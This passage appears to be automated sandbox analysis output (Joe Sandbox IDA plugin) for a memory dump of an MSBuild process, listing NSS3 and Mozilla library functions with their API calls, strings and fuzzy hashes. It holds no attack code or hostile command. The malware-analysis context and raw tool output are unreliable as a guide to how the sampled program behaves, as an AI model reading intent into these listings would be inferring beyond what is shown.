Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
Instruction ID: b842d13b0abc55a391537ddf8dcb463a4a7f8834ff94c831afa3db87062726f4
Opcode Fuzzy Hash: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
Instruction Fuzzy Hash: D501FC72B096A15BFF20AFA49E0DB493B787B1E71AF580034E50656F40DF64A1288795

Function 6C6EED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6EED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C6EEDCE

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

free.MOZGLUE(00000000,?,?,?,?,6C6EB04F), ref: 6C6EEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6EEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6EEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6EEEFB

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: e114d9741633866e23008c0d0bd72aad9d94258aa5875cb520f80e34083a681d
Instruction ID: 27500ddb50d3636ee1685233ef878f89e46ef463ce4b5eef45d0035c92ae600d
Opcode Fuzzy Hash: e114d9741633866e23008c0d0bd72aad9d94258aa5875cb520f80e34083a681d
Instruction Fuzzy Hash: 17819BB1A062059FEB10CF58D884BAB7BF5BF8D308F14442AE8159B751DB30E905CBE9

Function 6C6ECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6EC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6EDAE2,?), ref: 6C6EC6C2

PR_Now.NSS3 ref: 6C6ECD35

Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED

Part of subcall function 6C6D6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F

PR_GetCurrentThread.NSS3 ref: 6C6ECD54

Part of subcall function 6C749BF0: TlsGetValue.KERNEL32(?,?,?,6C790A75), ref: 6C749C07

Part of subcall function 6C6D7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681CCC,00000000,00000000,?,?), ref: 6C6D729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6ECD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6ECE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6ECE2C

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6ECE40

Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D

Part of subcall function 6C6ECEE0: PORT_ArenaMark_Util.NSS3(?,6C6ECD93,?), ref: 6C6ECEEE
Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ECD93,?), ref: 6C6ECEFC
Part of subcall function 6C6ECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ECD93,?), ref: 6C6ECF0B
Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ECD93,?), ref: 6C6ECF1D

Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF47
Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF67
Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ECD93,?,?,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF78

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 5bc4454397843f7995ae3577afe451c8e264abc12c6754aeca232f9908d778fe
Instruction ID: 4b5ccf638261d324c56a765a09ce250565cb5902f46c8a10c3fb670b9b8f57a6
Opcode Fuzzy Hash: 5bc4454397843f7995ae3577afe451c8e264abc12c6754aeca232f9908d778fe
Instruction Fuzzy Hash: B351D672A06204AFE710DF69DC40BEA7BF4AF4C348F250526D9169B740EB31ED06CB99

Function 6C6965D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C69660F

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

free.MOZGLUE(00000000), ref: 6C696660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C69667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C69669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C6966B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6966C8

Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?), ref: 6C6C274D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: ab9330b15915a2491da3a2277d168d7a108d9074ebd38b7749c5ab2202cae7c3
Instruction ID: 7b2bcf4655199320a41386822fcd65410f788a06283d409ac7c49b421e2f09fe
Opcode Fuzzy Hash: ab9330b15915a2491da3a2277d168d7a108d9074ebd38b7749c5ab2202cae7c3
Instruction Fuzzy Hash: 263163B5E0121A9BDB40CFA8D841AAE77F4AF49358F140028EC15E7701E731E904CBEA

Function 6C6E2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C6E2576
PORT_Alloc_Util.NSS3(00000000), ref: 6C6E2585

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C6E25A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C6E25AF
free.MOZGLUE(00000000), ref: 6C6E25BB
free.MOZGLUE(00000000), ref: 6C6E25CA

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
Instruction ID: 2fb1201073eb942f8ff2dba71ca76ed2c7a72d8c66c1a9fa3b9ead77a9c5c1c8
Opcode Fuzzy Hash: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
Instruction Fuzzy Hash: 3C01D2B170A2127BFF1027659C19E37375EEB457A6B100131BD19C5681ED60D8008AF5

Function 6C66C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C66C4F0
free.MOZGLUE ref: 6C66C51A
TlsSetValue.KERNEL32 ref: 6C66C540
free.MOZGLUE ref: 6C66C557
DeleteCriticalSection.KERNEL32 ref: 6C66C56A
free.MOZGLUE ref: 6C66C576

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
Instruction ID: 716e50720754ef74767aa73eaf008c587baff73b95787657ec012776d61fd420
Opcode Fuzzy Hash: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
Instruction Fuzzy Hash: 6D112E74604B508BCB10BF7AC44955EBFF4BF45749F454A6DD8CA87A00EB34A094CB96

Function 6C68E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6C697F5D,00000000,00000000,?,?,?,6C6980DD), ref: 6C68E532

Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490AB
Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490C9
Part of subcall function 6C749090: EnterCriticalSection.KERNEL32 ref: 6C7490E5
Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749116
Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C74913F

PR_EnterMonitor.NSS3(6C6980DD), ref: 6C68E549

Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C7491AA
Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749212
Part of subcall function 6C749090: _PR_MD_WAIT_CV.NSS3 ref: 6C74926B

PR_ExitMonitor.NSS3 ref: 6C68E56D
PL_HashTableDestroy.NSS3 ref: 6C68E57B

Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(?,?,6C68E175), ref: 6C68E19C
Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(6C68E175), ref: 6C68E1AA
Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E208
Part of subcall function 6C68E190: PL_HashTableRemove.NSS3(?), ref: 6C68E219
Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E231
Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E249
Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E257

PR_ExitMonitor.NSS3(6C6980DD), ref: 6C68E5B5
PR_DestroyMonitor.NSS3 ref: 6C68E5C3

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
Instruction ID: cc87d72c2d08b110838d3890f40ed1a5b6b369141b3eae7fade93b42af39c4e2
Opcode Fuzzy Hash: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
Instruction Fuzzy Hash: 1D0180B6E11280CBEF805B68DA09EA13BB8F71B74CF041036D81481A61FF325658FB96

Function 6C60E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E5BC

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C60E525, 6C60E596, 6C60E5A7
%s at line %d of [%.10s], xrefs: 6C60E534, 6C60E5B6
database corruption, xrefs: 6C60E52F, 6C60E5B1

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
Instruction ID: 40de20b1201bbcecb85e9b8327db6a9ece0476573a9f03a38a29879cdc724e72
Opcode Fuzzy Hash: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
Instruction Fuzzy Hash: 2E3146317007255BC3168EA9C9819ABB3A0EB41314B540D7DE888B7B81F372E945C7E8

Function 6C6F6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F6E57

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6EAA

Strings

nyl, xrefs: 6C6F6DF9

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nyl
API String ID: 3163584228-467026884
Opcode ID: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
Instruction ID: 41af5cfaca3f9e4d94bc31b9e29f5fba0e587043b64ddb54881efeb2829e9ad9
Opcode Fuzzy Hash: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
Instruction Fuzzy Hash: 7231F533618612EFDB145F34DD08396BBA6AB0531AF10063CD4AAD2A40EB31E85BCF85

Function 6C686420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C685DEF,?,?,?), ref: 6C6864A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C6864C2

Strings

]hl, xrefs: 6C686489

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]hl
API String ID: 3886907618-2786816073
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 0a19c55f07475f3a17e5cef6362d2306877db278b1eca2095ab66b842cacf706
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: AB21E7B1A122016BEB209E68DC09BAB76E9EF40318F148538F51AC6B41E7B2D558C7B5

Function 6C670DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C670BDE), ref: 6C670DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C670BDE), ref: 6C670DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C670BDE), ref: 6C670DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C670BDE), ref: 6C670E32

Strings

%s incr => %d (find lib), xrefs: 6C670E2D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 0b8b72a8f5620ca0fd73b2dafb0b2fcb8797e11912de86fd5ef7dd79bbdb4908
Instruction ID: a7815b9e6466cab06a498284822d298459f99c72c1f8b21a931a92f12bcf971a
Opcode Fuzzy Hash: 0b8b72a8f5620ca0fd73b2dafb0b2fcb8797e11912de86fd5ef7dd79bbdb4908
Instruction Fuzzy Hash: 8201D4727002149FE6209F249C49E1773ACDF45B09B15487DE949D3B41E762FC1587F1

Function 6C6B2520 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetFunctionList), ref: 6C6B2538
PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6C6B2551

Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E

Strings

ppFunctionList = 0x%p, xrefs: 6C6B254C
nyl, xrefs: 6C6B2569, 6C6B2590
C_GetFunctionList, xrefs: 6C6B2533

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
